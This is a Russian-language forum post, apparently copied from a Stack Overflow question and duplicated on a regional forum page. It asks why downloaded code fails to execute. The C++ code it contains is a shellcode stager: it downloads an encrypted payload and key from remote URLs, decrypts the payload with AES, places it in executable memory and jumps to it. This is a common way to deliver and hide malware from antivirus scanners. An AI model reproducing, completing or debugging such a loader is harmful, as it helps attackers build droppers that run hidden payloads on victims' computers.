Мобильная версияПомогите, не могу заставить расшифрованный файл выполниться в памяти.
"Код расшифрованного файла выполняется корректно в ручном режиме и расшифровывается без ошибок"
Думаю, ошибка где-то в неправильном определении размера
Я использую этот код, возможно, где-то есть ошибка, но я ее не вижу
#include
#include
#include
#include
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "crypt32.lib")
#define FILE_URL L"https://example/file.bin"
#define KEY_URL L"https://example/key.bin"
void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT) &&
CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash) &&
CryptHashData(hHash, (BYTE*)key, keyLen, 0) &&
CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen);
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
}
}
int main() {
WCHAR filePath[MAX_PATH], keyPath[MAX_PATH];
GetTempPathW(MAX_PATH, filePath);
wcscat_s(filePath, L"\\file.bin");
GetTempPathW(MAX_PATH, keyPath);
wcscat_s(keyPath, L"\\key.bin");
if (URLDownloadToFileW(NULL, FILE_URL, filePath, 0, NULL) == S_OK &&
URLDownloadToFileW(NULL, KEY_URL, keyPath, 0, NULL) == S_OK) {
HANDLE File = CreateFileW(filePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
HANDLE keyFile = CreateFileW(keyPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (File != INVALID_HANDLE_VALUE && keyFile != INVALID_HANDLE_VALUE) {
DWORD fileSize = GetFileSize(File, NULL);
DWORD keySize = GetFileSize(keyFile, NULL);
char* fileData = (char*)malloc(fileSize);
char* keyData = (char*)malloc(keySize);
DWORD bytesRead;
if (ReadFile(File, fileData, fileSize, &bytesRead, NULL) &&
ReadFile(keyFile, keyData, keySize, &bytesRead, NULL)) {
DecryptAES(fileData, fileSize, keyData, keySize);
void* exec = VirtualAlloc(0, fileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (exec != NULL) {
memcpy(exec, fileData, fileSize);
((void(*)())exec)();
VirtualFree(exec, 0, MEM_RELEASE);
}
}
free(fileData);
free(keyData);
CloseHandle(File);
CloseHandle(keyFile);
}
}
return 0;
}
Подробнее здесь: https://stackoverflow.com/questions/781 ... t-executed
С++ | Расшифрованный код в памяти не выполняется ⇐ C++
Программы на C++. Форум разработчиков
-
Anonymous
1710726680
Anonymous
Помогите, не могу заставить расшифрованный файл выполниться в памяти.
"Код расшифрованного файла выполняется корректно в ручном режиме и расшифровывается без ошибок"
Думаю, ошибка где-то в неправильном определении размера
Я использую этот код, возможно, где-то есть ошибка, но я ее не вижу
#include
#include
#include
#include
#pragma comment(lib, "urlmon.lib")
#pragma comment(lib, "crypt32.lib")
#define FILE_URL L"https://example/file.bin"
#define KEY_URL L"https://example/key.bin"
void DecryptAES(char* shellcode, DWORD shellcodeLen, char* key, DWORD keyLen) {
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT) &&
CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash) &&
CryptHashData(hHash, (BYTE*)key, keyLen, 0) &&
CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)shellcode, &shellcodeLen);
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
}
}
int main() {
WCHAR filePath[MAX_PATH], keyPath[MAX_PATH];
GetTempPathW(MAX_PATH, filePath);
wcscat_s(filePath, L"\\file.bin");
GetTempPathW(MAX_PATH, keyPath);
wcscat_s(keyPath, L"\\key.bin");
if (URLDownloadToFileW(NULL, FILE_URL, filePath, 0, NULL) == S_OK &&
URLDownloadToFileW(NULL, KEY_URL, keyPath, 0, NULL) == S_OK) {
HANDLE File = CreateFileW(filePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
HANDLE keyFile = CreateFileW(keyPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (File != INVALID_HANDLE_VALUE && keyFile != INVALID_HANDLE_VALUE) {
DWORD fileSize = GetFileSize(File, NULL);
DWORD keySize = GetFileSize(keyFile, NULL);
char* fileData = (char*)malloc(fileSize);
char* keyData = (char*)malloc(keySize);
DWORD bytesRead;
if (ReadFile(File, fileData, fileSize, &bytesRead, NULL) &&
ReadFile(keyFile, keyData, keySize, &bytesRead, NULL)) {
DecryptAES(fileData, fileSize, keyData, keySize);
void* exec = VirtualAlloc(0, fileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (exec != NULL) {
memcpy(exec, fileData, fileSize);
((void(*)())exec)();
VirtualFree(exec, 0, MEM_RELEASE);
}
}
free(fileData);
free(keyData);
CloseHandle(File);
CloseHandle(keyFile);
}
}
return 0;
}
Подробнее здесь: [url]https://stackoverflow.com/questions/78177614/c-decrypted-code-in-memory-is-not-executed[/url]
Ответить
1 сообщение
• Страница 1 из 1
Перейти
- Кемерово-IT
- ↳ Javascript
- ↳ C#
- ↳ JAVA
- ↳ Elasticsearch aggregation
- ↳ Python
- ↳ Php
- ↳ Android
- ↳ Html
- ↳ Jquery
- ↳ C++
- ↳ IOS
- ↳ CSS
- ↳ Excel
- ↳ Linux
- ↳ Apache
- ↳ MySql
- Детский мир
- Для души
- ↳ Музыкальные инструменты даром
- ↳ Печатная продукция даром
- Внешняя красота и здоровье
- ↳ Одежда и обувь для взрослых даром
- ↳ Товары для здоровья
- ↳ Физкультура и спорт
- Техника - даром!
- ↳ Автомобилистам
- ↳ Компьютерная техника
- ↳ Плиты: газовые и электрические
- ↳ Холодильники
- ↳ Стиральные машины
- ↳ Телевизоры
- ↳ Телефоны, смартфоны, плашеты
- ↳ Швейные машинки
- ↳ Прочая электроника и техника
- ↳ Фототехника
- Ремонт и интерьер
- ↳ Стройматериалы, инструмент
- ↳ Мебель и предметы интерьера даром
- ↳ Cантехника
- Другие темы
- ↳ Разное даром
- ↳ Давай меняться!
- ↳ Отдам\возьму за копеечку
- ↳ Работа и подработка в Кемерове
- ↳ Давай с тобой поговорим...
